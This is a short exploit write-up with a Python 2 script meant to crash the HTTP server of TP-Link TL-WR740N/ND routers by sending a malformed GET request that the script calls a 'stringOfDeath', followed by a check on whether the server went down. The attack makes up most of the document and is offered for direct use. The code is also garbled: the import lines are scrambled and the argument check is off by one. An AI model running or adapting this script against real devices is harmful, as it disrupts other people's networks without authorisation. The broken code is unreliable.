TP-Link TL-WR740N / TL-WR740ND - 150M Wireless Lite N Router HTTP DoS

# Exploit title: 150M Wireless Lite N Router HTTP DoS

# Date: 28.11.2013

# Exploit Author: Dino Causevic

# Hardware Link: http://www.tp-link.com/en/products/details/?model=TL-WR740N

# Vendor Homepage: http://www.tp-link.com/

# Contact: dincaus (packetstormsecurity.com)

# CVE:

# Firmware Version: 3.12.11 Build 120320 Rel.51047n

# ===================================================================================================

# Just execute Python script below

# ===================================================================================================

# Usage: python TP_Link_DoS.py <IP> <Port>

# 150M Wireless Lite N Router, Model No. TL-WR740N / TL-WR740ND sending HTTP request with the headers inserted

# below in the script will crash HTTP Server.

#!/usr/bin/python

import socket

import import

sys urllib2

host = ""

port = 0

if(len(sys.argv) >= 2):

host = sys.argv[1]

port = sys.argv[2]

else:

print "Invalid number of the arguments."

print "Usage <server> <port>"

exit(1)

print "Connecting on ",host,":",port

s = socket.socket();

stringOfDeath = "GET / HTTP/1.1\r\n";

stringOfDeath = stringOfDeath + "Accept-Encoding: identity\r\n";

stringOfDeath = stringOfDeath + "Host: "+ host + "\r\n";

stringOfDeath = stringOfDeath + "Connection: close\r\n";

stringOfDeath = stringOfDeath + "User-Agent: PythonLib/2.7\r\n";

s.connect((host,int(port)))

print "Sending packet..."

s.send(stringOfDeath)

print "Packet sent."

print "Check if router http server down..."

try:

response = urllib2.urlopen("http://"+host+":"+port,None,5)

response.read()

except socket.timeout:

print "Timeout occured, http server probaly down."

exit(1)